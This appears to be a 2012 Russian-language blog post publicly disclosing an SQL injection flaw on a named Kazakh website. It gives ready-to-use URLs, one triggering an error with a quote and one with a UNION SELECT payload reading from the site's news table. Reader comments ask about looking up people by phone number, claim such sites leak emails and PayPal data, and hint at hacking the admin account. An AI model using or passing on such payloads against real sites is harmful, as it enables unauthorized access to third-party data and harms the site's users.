Уязвимый Казнет и не только

SQL Уязвимость сайта Activ.kz

SQL Уязвимость, была найдена в далёком 2010 году, с тех пор, сайт переделывали, но уязвимость осталась...

http://www.activ.kz/ru/?l=news&o=display&page=&idx=1"

http://www.activ.kz/ru/?l=news&o=display&page=&idx=1+union+select+1,2,3,4,NEWS_ID,6,7,8+from+news

Уязвимость

Serj, 23 июля 2012

Аима Аубакирова

Аима Аубакирова
25 февраля 2015 01:33

А можно по номеру телефона актив узнать что нибудь о человеке?

25 февраля 2015 01:33 Комментировать
Ибрахим Никишин

Ибрахим Никишин
4 июля 2013 14:59

А что дает эта уязвимость, помимо того, что выводится ошибка?

4 июля 2013 14:59 Комментировать
1. Serj
  
  Serj
  4 июля 2013 19:50
  
  Это можно спросить у гугла)
  
  4 июля 2013 19:50 Комментировать
2. Ибрахим Никишин
  
  Ибрахим Никишин
  4 июля 2013 19:52
  
  Я знаю, что можно сделать с инъекцией в общем. Я имел ввиду, что конкретно здесь можно сделать, помимо того, что ошибка выводится?
  
  4 июля 2013 19:52 Комментировать
3. Serj
  
  Serj
  5 июля 2013 10:56
  
  Ибрахим, всё))
  
  5 июля 2013 10:56 Комментировать
4. Игорь Зайцев
  
  Игорь Зайцев
  16 августа 2014 04:55
  
  Sergey, неат из таких сайтов можно вытащить все от почто до пай пэлов
  
  16 августа 2014 04:55 Комментировать
Амир Тимуров

Амир Тимуров
3 декабря 2012 21:52

SQL Injection

3 декабря 2012 21:52 Комментировать
DELETED

DELETED
16 сентября 2012 00:28

xD

16 сентября 2012 00:28 Комментировать
DELETED

DELETED
5 августа 2012 03:41

я знаю что такое)а ты пробовал админа взломать?

5 августа 2012 03:41 Комментировать
1. Валерий Радионов
  
  Валерий Радионов
  3 декабря 2014 14:16
  
  А ты как думаешь)))
  
  3 декабря 2014 14:16 Комментировать